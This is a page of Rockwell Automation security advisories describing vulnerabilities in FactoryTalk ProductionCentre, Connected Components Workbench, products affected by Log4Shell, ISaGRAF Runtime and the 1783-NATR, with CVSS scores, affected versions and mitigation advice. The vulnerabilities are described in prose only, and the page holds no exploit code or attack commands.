Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

If you have questions regarding this notice, please send an email to our product security inbox at: PSIRT@rockwellautomation.com

Additional Links

PN1592 | PN1592 | Vulnerable Third-Party Components in FactoryTalk® ProductionCentre
Published Date:
May 04, 2022
Last Updated:
May 04, 2022
Products:
FactoryTalk ProductionCentre
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision History
Version 1.0 – May 4, 2022

Executive Summary

Rockwell Automation discovered multiple vulnerabilities affecting third-party software utilized by our FactoryTalk® ProductionCentre (FTPC) products. If exploited, these vulnerabilities could have various effects, including but not limited to, remote code execution, information disclosure, and denial of service on FTPC products.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerabilities, including products in scope and recommended countermeasures, are provided herein.

Affected Products

FactoryTalk® ProductionCentre v10.04 and earlier

Vulnerability Details

As part of our commitment to security, Rockwell performs routine testing and vulnerability scanning to maintain the security posture of products. Due to open-source testing, we were made aware that third-party components utilized within our FTPC products contain vulnerabilities that range from low to high. The third-party components are listed below.
Apache ActiveMQ Version 5.15.0 Dom4J Version 1.61
Apache Common BeanUtils Version 1.9.0 Hibernate ORM Version 3.3.2
Apache CXF Version 3.1.10 Jackson Databind Version 2.1.4
Apache Http Client Version 4.5.2 JasperReports Library Version 6.2.0
Apache Santuario (Java) 2.0.8 Java Platform Standard Edition Version 8u181
Apache Xalan Version (Java) 2.7.1 JBoss Remoting Version 4.0.22.Final
Apache Xerces2J Version 2.11.0.SP5 JGroups Version 2.12.2 Final
Bouncy Castle Version 1.36, 1.44, 1.55 Spring Framework Versions 2.5.5, 4.3.8-4.3.9
Cryptacular Version 1.51 Undertow Core Versions 1.0.10.Final
Codehaus XFire Version 0.9.5.2 Velocity.apache.org Version 1.7

Risk Mitigation & User Action

Customers using the affected software are encouraged to implement the risk mitigations below to minimize the risk of vulnerabilities. We encourage customers to combine the risk mitigations with security best practices to deploy a defense-in-depth strategy.

General Security Guidelines

  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, see Knowledgebase Article PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also, recognize that a VPN is only as secure as the connected devices.
Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable the assessment, design, implementation, and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Additional Links

If you have questions regarding this notice, please send an email to our product security inbox at: PSIRT@rockwellautomation.com

High
PN1589 | PN1589 | Multiple Products Vulnerable to Deserialization of Data
Published Date:
April 04, 2022
Last Updated:
April 04, 2022
CVE IDs:
CVE-2022-1118
Products:
Using CCW with Micro800 Controllers, ISaGRAF, Using CCW with Component Class Drives, Using CCW with PanelView Component Terminals
CVSS Scores:
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision History
Version 1.0 – April 4, 2022

Executive Summary

Rockwell Automation received a report from the researcher Kimiya through Trend Micro’s Zero Day Initiative about vulnerabilities in Connected Components Workbench™, ISaGRAF® Workbench and Safety Instrumented Systems Workbench for Trusted® controllers. If successfully exploited, these vulnerabilities may result in remote code execution. These vulnerabilities all require user interaction through a phishing attack, for example, to be successfully exploited.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

  • Connected Components Workbench v13.00.00 and below.
  • ISaGRAF Workbench v6.0-v6.6.9
  • Safety Instrumented System Workstation v1.2 and below (for Trusted Controllers)

Vulnerability Details

CVE-2022-1118- Deserialization of untrusted data may result in arbitrary code execution
Connected Components Workbench does not limit the objects that can be deserialized. This vulnerability allows attackers to craft a malicious serialized object that, if opened by a local user in Connected Components Workbench, may result in arbitrary code execution. This vulnerability requires user interaction to be successfully exploited.

CVSS v3.1 Base Score: 8.6/10[HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected software are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Products Affected Suggested Actions
Connected Components Workbench Versions 13.00 and below Customers should update to version 20.00, which mitigates this vulnerability.
ISaGRAF Workbench Versions 6.0-6.6.9 It is recommended that customers follow the security guidelines below until an updated release is available to mitigate this issue.
SIS Workstation Versions 1.2 and below (for Trusted Controllers) It is recommended that customers follow the security guidelines below until an updated release is available to mitigate this issue.

If an upgrade is not possible or available, customers should consider deploying the following mitigations:
  • Run Connected Components Workbench as a User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Do not open untrusted .ccwsln files with Connected Component Workbench, ISaGRAF, or SISW. Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
  • Use of Microsoft® AppLocker or other similar allow list applications can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at QA17329 - Using Rockwell Automation Software Products with AppLocker
  • Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Security Guidelines

  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.
Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com)

Additional Links

Critical
PN1579 | Log4Shell Vulnerability Notice
Published Date:
January 21, 2022
Last Updated:
December 01, 2024
CVE IDs:
CVE-2021-4104, CVE-2021-45046, CVE-2019-17571, CVE-2021-44228
Products:
Production Management
CVSS Scores (v3.1):
10, 3.7, 8.1, 9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes
Más información Less Details Chevron DownChevron Down

 

Revision History
Revision Number
2.2
Revision History
Version 1.0 – 12-Dec-2021. Initial Version

Version 1.1 – 15-Dec-2021. Updated Affected Products and Risk Mitigation & User Actions


Version 1.2 – 17-Dec-2021. Updated FTA DataView Versions affected

Version 2.0 – 19-Dec-2021. Updated Affected Products and Risk Mitigation & User Actions, etc.


Version 2.1 – January 7, 2022. Updated FactoryTalk® Analytics™ DataView, Data Flow ML, Warehouse Management Patch Guidance and User Actions, etc.
Version 2.2 – January 21, 2022 Updated DataView Mitigation Actions, etc

Executive Summary

On December 9, 2021, a vulnerability was announced named “Log4Shell” by researchers. This vulnerability allows for remote code execution by exploiting the Java Logging Library log4j2.

Rockwell Automation is aware of this vulnerability and of how it could, if exploited, potentially impact our customers’ environments. Rockwell Automation has completed process of evaluation on how the mitigation techniques will impact the functionality and performance of the Rockwell Automation hardware, software, and pre-engineered products and solutions that incorporate this software.

Affected Products

Rockwell Automation has investigated its product portfolio to identify which of its products may be directly affected by the "Log4Shell" vulnerability. Rockwell Automation will continue to monitor this situation and will update this advisory if necessary. Our investigation has indicated that the following Rockwell Automation products are affected.
Product Affected Versions Affected
Plex (A Rockwell Automation Company) Industrial Internet of Things All Versions < 2.17
Fiix (A Rockwell Automation Company) CMMS™ core V5 This product is cloud-based and has been updated for all customers.
Warehouse Management 4.01.00, 4.02.00, 4.02.01, 4.02.02
EIG (Discontinued) 3.03.00
Industrial Data Center 9300-NS-ESSENTIAL, 9300-NS-ESSENTIALPLUS – Gen 1, Gen 2, Gen 3, Gen 3.5
VersaVirtual™ Application 9300-VV2000RN, 9300-VV2000EN, 9300-VV1000RN, 9300-VV1000EN – Series A
FactoryTalk® Analytics™ DataFlowML All Versions until 4.00.00 (including)
FactoryTalk Analytics DataView All
Firewall Managed Support – Cisco FirePOWER® Thread Defense 9300-FMAN, 9300-FSYS Version 6.2.3 – 7.1.0

Vulnerability Details

CVE-2021-44228: Apache Log4j2 JNDI features do not help protect against attacker-controlled LDAP and other JNDI related endpoints

Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

CVSS v3.1 Base Score: 10/10 [Critical]
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack.


It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. Note that previous mitigations involving configuration such as to set the system property log4j2.noFormatMsgLookup to true do NOT mitigate this specific vulnerability.

CVSS v3.1 Base Score: 3.7/10 [Moderate]
CVSS V3.1 Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

CVE-2021-4104: JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data


JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.

CVSS v3.1 Base Score: 8.1/10 [High]
CVSS V3.1 Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2019-17571: Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data

Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data which can be exploited to remotely execute arbitrary code when combined with a deserialization gadget when listening to untrusted network traffic for log data. This affects Log4j versions up to 1.2 up to 1.2.17.

CVSS v3.1 Base Score: 9.8/10 Critical]
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Risk Mitigation & User Action

Vulnerability Products Affected Suggested Actions
CVE-2021-44228 Plex Industrial IoT This product has been updated to version 2.17.1 and all vulnerabilities are mitigated at this time.  No user action is required.
Fiix CMMS core V5 The product has been updated to remove Log4j completely and is no longer vulnerable. No user interaction is required.
Warehouse Management Version 4.01.00, 4.02.00, 4.02.01, 4.02.02 Customers should upgrade to version 4.02.03, which has been released to mitigate this vulnerability.
MES EIG 3.03.00 This product is currently discontinued and therefore no patch will be provided. Customers should upgrade to EIG Hub if possible or work with their local representatives about alternative solutions.
Industrial Data Center (9300-NS-ESSENTIAL, 9300-NS-ESSENTIALPLUS) – Gen 1, Gen 2, Gen 3, Gen 3.5 - For non-managed support customers, follow the mitigation instructions outlined by VMware in VMSA-2021-0028.
- For managed support customers, Rockwell Automation support team will be reaching out to affected customers to implement mitigation steps. For specific site details, please contact the support team or your Customer Success Manager.
- For non-managed support customers with a with VNxE, follow the mitigation outlined by Dell in DSA-2021-298.
- For non-managed support customers with a Data Domain, follow the mitigation outlined by Dell in DSA-2021-274
VersaVirtual (9300-VV2000RN, 9300-VV2000EN, 9300-VV1000RN, 9300-VV1000EN) – Series A - For non-managed support customers, follow the mitigation instructions outlined by VMware in VMSA-2021-0028.2.
- For managed support customers, Rockwell Automation support team will be reaching out to affected customers to implement mitigation steps. For specific site details, please contact the support team or your Customer Success Manager.
FactoryTalk Analytics DataFlowML Customers should upgrade to version 4.00.01, which has been released to mitigate this vulnerability. It is recommended that customers not use DataFlow ML prior to version 4.00.01.
FactoryTalk Analytics DataView 3.02 Customers are required to upgrade from 3.02 to 3.03.01.  Customers who have prior versions are required to upgrade to 3.02 first. It is recommended that customers not use DataFlow ML prior to version 4.00.00.
Firewall Managed Support – Cisco Firepower Thread Defense (9300-FMAN, 9300-FSYS) Version 6.2.3 – 7.1.0 - For managed support customers, Rockwell Automation support team will be reaching out to affected customers to implement mitigation steps. For specific site details, please contact the support team or your Customer Success Manager.
- For non-managed support customers, follow the mitigation instructions outlined by Cisco in CSCwa46963.
CVE-2021-45046, CVE-2021-4104, CVE-2019-17571
 No products affected at this time.

Products Using Log4j 1.2
A number of Rockwell Automation products contain log4j libraries that may be detected by various scanning tools. These products do not use the JMSAppender nor the Socket Server and are not vulnerable to CVE-2021-4104 and CVE-2019-17571:

Products Evaluated and Not Affected

Suggested Actions
Factory Talk Analytics Data View 3.02.00, 3.03.00, 4.00.00, 4.01.00 No actions are needed as these products do not use the JMSAppender nor the Socket Server and therefore are not vulnerable.
Data Scheduler
FactoryTalk Augmented Modeler
Factory Talk Analytics Data Flow ML 2.01
Factory Talk Analytics Information Platform
Live Transfer 10.4, 11.0
Pavilion8
Factory Talk Analytics Security Provider 3.02.00, 3.03.00
PanelView 5000
FactoryTalk Production Centre (All Versions)
Factory Talk Pharma Suite (All Versions)
Studio 5000 View Designer Studio 5000 does not use the JMSAppender nor the Socket Server and is not vulnerable.  
Note: Studio 5000 consists of Studio 5000 Logix Designer and Studio 5000 View Designer.  If Logix Designer is the only component required, then View Designer version 8 or older may be removed by uninstalling it using the Windows Add/Remove Programs feature.  Uninstall “Studio 5000 View Designer”.  This will remove the log4j 1.2x library completely.  Alternatively, update Studio 5000 View Designer to version 9 or later which has updated log4j libraries that are not vulnerable.

General Security Guidelines

See the Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Industrial Security Services website for information on security services from Rockwell Automation to assess, protect, detect, respond and recover from incidents. These services include assessments, designs, implementations, industrial anomaly detection, patch management, and remote infrastructure monitoring and administration.

We also recommend concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located in PN1354 – Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website .

If you have questions regarding this notice, please send an email to our product security inbox at: secure@ra.rockwell.com.

General Mitigations

  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • Visit links below for more mitigation techniques
ADDITIONAL LINKS

 

Critical
PN1567 | PN1567 | ISaGRAF Runtime Affected by Multiple Vulnerabilities
Published Date:
December 30, 2021
Last Updated:
December 30, 2021
CVE IDs:
CVE-2020-25184, CVE-2020-25180, CVE-2020-25176, CVE-2020-25182, CVE-2020-25178
Products:
AADvance, ISaGRAF, Micro800
CVSS Scores:
9.1, 7.8, 5.3, 7.5, 6.7
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision Number

1.3

Revision History
Version 1.3 – March 19th, 2024. Added AADvance Eurocard controller to Affected Products and Updated Suggested Actions for AADvance Eurocard controller
Version 1.2 - December 30, 2021. Updated Suggested Actions for AADvance® Controller version 1.40 and earlier

Executive Summary

Rockwell Automation received a report from Kaspersky regarding five vulnerabilities in ISaGRAF® Runtime 4 and 5. If successfully exploited, these vulnerabilities may result in remote code execution, information disclosure, or denial of service.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

ISaGRAF Runtime 4.x and 5.x
The following Rockwell Automation products are based on ISaGRAF to design integrated automation solutions:
  • AADvance® Controller version 1.32 and earlier
  • ISaGRAF Free Runtime in ISaGRAF6 Workbench version 6.6.8 and earlier
  • Micro800™  family, all versions

Vulnerability Details

CVE-2020-25176: Code Execution due to Relative Path Traversal
Some commands used by the ISaGRAF eXchange Layer (IXL) protocol perform various file operations in the file system. Since the parameter pointing to the file name is not checked for reserved characters, it is possible for a remote attacker authenticated on the IXL protocol to traverse an application’s directory, which could lead to remote code execution.

CVSS v3.1 Base Score: 9.1/10 [CRITICAL]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2020-25184: Information Disclosure due to cleartext storage of passwords in a file and memory
ISaGRAF Runtime stores the password in plaintext in a file which is located in the same directory with the executable file. ISaGRAF Runtime reads the file and saves the data in a variable without any additional modification. A local, unauthenticated attacker could compromise the user passwords resulting in information disclosure.

CVSS v3.1 Base Score: 7.8/10 [HIGH]
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2020-25178: Information Disclosure due to Cleartext Transmission of Information
ISaGRAF Workbench communicates with ISaGRAF Runtime using TCP/IP. The communication protocol provides various file system operations as well as uploading applications. Data is transferred over this protocol unencrypted, which could allow a remote, unauthenticated attacker to upload, read and delete files.

CVSS v3.1 Base Score: 7.5/10 [HIGH]
CVSS Vector: CCVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2020-25182: Code Execution due to Uncontrolled Search Path Element
ISaGRAF Runtime searches and loads DLLs as dynamic libraries. Uncontrolled loading of dynamic libraries could allow a local, unauthenticated attacker to execute arbitrary code. This vulnerability only affects Microsoft Windows systems running ISaGRAF Runtime.

CVSS v3.1 Base Score: 6.7/10 [HIGH]
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE-2020-25180: Information Disclosure due to Hard-coded Cryptographic Key
ISaGRAF Runtime includes the functionality of setting a password which is required to execute privileged commands. The password value passed to ISaGRAF Runtime is the result of encryption performed with a fixed key value using the Tiny Encryption Algorithm (TEA) on a password that has been entered or saved.  A remote, unauthenticated attacker could pass his own encrypted password to the ISaGRAF 5 Runtime, which may result in information disclosure on the device.

CVSS v3.1 Base Score: 5.3/10 [MEDIUM]
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

Risk Mitigation & User Action

Customers using the affected software are encouraged to update to an available software and are directed towards risk mitigation. Customers are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense-in-depth strategy.
Vulnerability Affected Products Suggested Mitigations
CVE-2020-25176 AADvance Controller
ISaGRAF5 Runtime
Micro800 family
AADvance Eurocard controller

Rockwell Automation recommends upgrading to ISaGRAF Runtime 5 version 5.72.00 and
AADvance Controller firmware to version 1.041.3

Customers should confirm that the least-privilege user principle is followed, and user/service account access to Runtime's folder location is granted with a minimum number of rights as needed.

For ISaGRAF, customers are encouraged to restrict or block traffic on TCP 1131 from outside of the industrial control system network zone. For more information on the TCP/UDP ports used by ISaGRAF refer to product documentation.

Since ISaGRAF 5 Runtime is provided to a customer as a development kit, implementing least-privilege may vary from implementation to implementation based on the hardware in use.

For AADvance controllers, Customers should update to version 1.041.3 to mitigate vulnerability.

For Micro800 family, to reduce risk, customers are encouraged to help protect the controller with a password. Additionally, customers deploying Micro870®, Micro850®, or Micro830® controllers are encouraged to put the controller's mode switch to "RUN". Customers are encouraged to restrict or block traffic on TCP 44818 from outside the industrial control system network zone.

Customers should also confirm they are employing proper network segmentation and security controls. Specifically, network exposure for all control system devices should be minimized, and control systems should be behind firewalls and isolated from other networks when possible.

For more information on the TCP/UDP ports used by Rockwell Automation products, see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products .

Rockwell Automation recommends upgrading to AADvance Eurocard Controller firmware to version 1.041
CVE-2020-25178 AADvance Controller
ISaGRAF5 Runtime
Micro800 family
AADvance Eurocard controller

Rockwell Automation recommends upgrading to ISaGRAF Runtime 5 version 5.72.00 and
AADvance Controller firmware to version 1.041.3.

Customers should confirm that the least-privilege user principle is followed, and user/service account access to Runtime's folder location is granted with a minimum number of rights as needed.

Since ISaGRAF 5 Runtime is provided to a customer as a development kit, implementing least-privilege may vary from implementation to implementation based on the hardware in use.

Rockwell Automation recommends upgrading to AADvance Eurocard Controller firmware to version 1.041
CVE-2020-25182 ISaGRAF5 Runtime Rockwell Automation recommends upgrading to ISaGRAF Runtime 5 version 5.72.00.

Customers should confirm that the least-privilege user principle is followed, and user/service account access to Runtime's folder location is granted with a minimum number of rights as needed.

Since ISaGRAF 5 Runtime is provided to a customer as a development kit, implementing least-privilege may vary from implementation to implementation based on the hardware in use.
CVE-2020-25184 AADvance Controller
ISaGRAF5 Runtime
AADvance Eurocard controller

Rockwell Automation recommends upgrading to ISaGRAF Runtime 5 version 5.72.00 and AADvance Controller firmware to version 1.041.3.

Customers should confirm that the least-privilege user principle is followed, and user/service account access to Runtime's folder location is granted with a minimum number of rights as needed.

For ISaGRAF, restrict or block traffic on TCP 1131 from outside of the industrial control system network zone. For more information on the TCP/UDP ports used by ISaGRAF refer to product documentation.

Since ISaGRAF 5 Runtime is provided to a customer as a development kit, implementing least-privilege may vary from implementation to implementation based on the hardware in use.

For AADvance controllers, Customers should update to version 1.041.3 to mitigate this vulnerability.

Rockwell Automation recommends upgrading to AADvance Eurocard Controller firmware to version 1.041
CVE-2020-25180

AADvance Controller
ISaGRAF5 Runtime
AADvance Eurocard controller

 

To reduce risk, customers should confirm they are employing proper network segmentation and security controls. Specifically, network exposure for all control system devices should be minimized, and control systems should be behind firewalls and isolated from other networks when possible. See the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide for best practices deploying network segmentation and broader defense in depth strategies.

Customers should consider using proper network infrastructure controls, such as firewalls, UTM devices, VPN, or other security appliances.

For ISaGRAF, restrict or block traffic on TCP 1131 from outside of the industrial control system network zone. For more information on the TCP/UDP ports used by ISaGRAF refer to product documentation.

Since ISaGRAF 5 Runtime is provided to a customer as a development kit, implementing least-privilege may vary from implementation to implementation based on the hardware in use.

For AADvance controllers, Customers should update to version 1.041.3 to mitigate this vulnerability.

Rockwell Automation recommends upgrading to AADvance Eurocard Controller firmware to version 1.041
 

General Security Guidelines

  • Use proper network infrastructure controls, such as firewalls, to help ensure that any communication protocols from unauthorized sources are blocked.
  • Block traffic to all protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to ports using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports, refer to the product documentation.
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft® AppLocker or other similar allow list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329 - Using Rockwell Automation Software Products with AppLocker.
  • Confirm that the least-privilege user principle is followed, and user/service account access to shared resources is only granted with a minimum number of rights as needed.
  • Do not open untrusted .isasln and .acfproj files with ISaGRAF6 Workbench.
  • Do not click on or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).


ADDITIONAL LINKS

 

Critical
PN1580 | PN1580 | GOAhead Web Server vulnerability in 1783-NATR
Published Date:
December 16, 2021
Last Updated:
December 16, 2021
CVE IDs:
CVE-2019-5097, CVE-2019-5096
Products:
Network Address Translation (NAT) Device
CVSS Scores:
7.5, 9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.2
Revision History
Version 1.0 – December 15, 2021
Version 1.1 - December 16, 2021: Updated Suggested Actions
Version 1.2 – January 21, 2021: Updated Suggested Actions To Mitigate

Executive Summary

Rockwell Automation received a report from Cisco® Talos™ Researchers regarding two vulnerabilities in the 1783-NATR. If successfully exploited, these vulnerabilities may result in remote code execution on the device through the GoAhead web server and a denial-of-service condition.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Detailed Information

CVE-2019-5096: GoAhead web server allows unauthenticated HTTP requests that may result in remote code execution

A remote unauthenticated attacker may be able to send a specially crafted HTTP request that can lead to a use-after-free condition during the processing of this request that can be used to corrupt heap structures, which would result in the ability for the attacker to execute remote code execution.

CVSS v3.1 Base Score: 9.8/10[Critical}

CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2019-5097: GoAhead web server allows specially crafted HTTP requests that may result in a denial-of-service for the device.

A remote unauthenticated attacker may be able to send a specially crafted HTTP request that can lead to an infinite loop in the process. The request can be unauthenticated in the form of GET or POSTS requests and does not require the requested resource on the server, which would lead to a denial-of-service attack on the device.

CVSS v3.1 Base Score: 7.5/10 [High]
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Affected Products

1783-NATR version 1.005

Risk Mitigation & User Action

Customers using the affected 1783-NATR are encouraged to update to an available firmware revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability Suggested Actions
CVE-2019-5096 Upgrade firmware to version 1.006 to mitigate this vulnerability.
CVE-2019-5097 Upgrade firmware to version 1.006 to mitigate this vulnerability.

General Security Guidelines

Network-based vulnerability mitigations for embedded products

  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that HTTP port 80 from unauthorized sources are blocked.
  • Consult the product documentation for specific features, such as a hardware mode switch setting, to which may be used to block unauthorized changes, etc.
  • Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to Port#80 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products .

General mitigations

Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as virtual private networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/security notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

